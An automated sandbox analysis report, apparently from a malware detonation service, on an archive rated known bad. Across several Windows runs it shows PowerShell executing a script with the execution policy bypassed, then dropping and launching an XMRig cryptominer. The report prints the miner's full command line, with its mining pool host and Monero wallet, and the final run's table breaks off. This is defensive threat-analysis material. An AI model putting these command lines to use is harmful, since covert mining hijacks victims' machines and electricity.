Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 20:13
Signatures
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240426-en
Max time kernel
290s
Max time network
286s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3080 wrote to memory of 4388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3080 wrote to memory of 4388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 121.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
Files
memory/3080-0-0x00007FFAD31E3000-0x00007FFAD31E5000-memory.dmp
memory/3080-2-0x0000023BA5700000-0x0000023BA5722000-memory.dmp
memory/3080-11-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/3080-12-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a00i550d.epz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3080-13-0x00007FFAD31E3000-0x00007FFAD31E5000-memory.dmp
memory/3080-14-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/3080-15-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/3080-17-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/3080-19-0x0000023BA5740000-0x0000023BA574A000-memory.dmp
memory/3080-18-0x0000023BA5750000-0x0000023BA5762000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4388-50-0x00000280187E0000-0x0000028018800000-memory.dmp
memory/4388-51-0x0000028018A30000-0x0000028018A50000-memory.dmp
memory/4388-52-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-53-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-54-0x0000028018A50000-0x0000028018A70000-memory.dmp
memory/4388-55-0x000002801A220000-0x000002801A240000-memory.dmp
memory/4388-56-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/3080-57-0x00007FFAD31E0000-0x00007FFAD3CA1000-memory.dmp
memory/4388-58-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-60-0x0000028018A50000-0x0000028018A70000-memory.dmp
memory/4388-59-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-61-0x000002801A220000-0x000002801A240000-memory.dmp
memory/4388-62-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-63-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-64-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-65-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-66-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-67-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-68-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-69-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-70-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-71-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-72-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-73-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-74-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-75-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-76-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-77-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-78-0x00007FF725020000-0x00007FF725C53000-memory.dmp
memory/4388-79-0x00007FF725020000-0x00007FF725C53000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
294s
Max time network
303s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2268 wrote to memory of 4188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2268 wrote to memory of 4188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/2268-3-0x00007FF954663000-0x00007FF954664000-memory.dmp
memory/2268-5-0x0000020CA2B90000-0x0000020CA2BB2000-memory.dmp
memory/2268-8-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-9-0x0000020CA2D70000-0x0000020CA2DE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nu45rb01.ef2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2268-10-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-25-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-29-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-30-0x00007FF954663000-0x00007FF954664000-memory.dmp
memory/2268-31-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-32-0x00007FF954660000-0x00007FF95504C000-memory.dmp
memory/2268-65-0x0000020CA2D40000-0x0000020CA2D4A000-memory.dmp
memory/2268-52-0x0000020CA2D50000-0x0000020CA2D62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4188-94-0x00000257DA340000-0x00000257DA360000-memory.dmp
memory/4188-95-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-96-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-97-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-98-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-99-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-100-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-101-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-102-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-103-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-104-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-105-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-106-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-107-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-108-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-109-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-110-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-111-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-112-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-113-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-114-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-115-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-116-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-117-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-118-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
memory/4188-119-0x00007FF7F78E0000-0x00007FF7F8513000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
294s
Max time network
301s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2776 wrote to memory of 3540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2776 wrote to memory of 3540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
Files
memory/2776-3-0x00007FFB323B3000-0x00007FFB323B4000-memory.dmp
memory/2776-5-0x00000129E0F10000-0x00000129E0F32000-memory.dmp
memory/2776-9-0x00000129F9580000-0x00000129F95F6000-memory.dmp
memory/2776-8-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-10-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eam5ksse.tm3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2776-25-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-29-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-30-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-31-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/2776-51-0x00000129F9310000-0x00000129F9322000-memory.dmp
memory/2776-64-0x00000129E0F70000-0x00000129E0F7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3540-93-0x000001FB09D10000-0x000001FB09D30000-memory.dmp
memory/3540-94-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-95-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-96-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-97-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-98-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-99-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-100-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-101-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-102-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-103-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-104-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-105-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-106-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-107-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-108-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-109-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-110-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-111-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-112-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-113-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-114-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-115-0x00007FF613620000-0x00007FF614253000-memory.dmp
memory/3540-116-0x00007FF613620000-0x00007FF614253000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240419-en
Max time kernel
293s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3084 wrote to memory of 3652 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
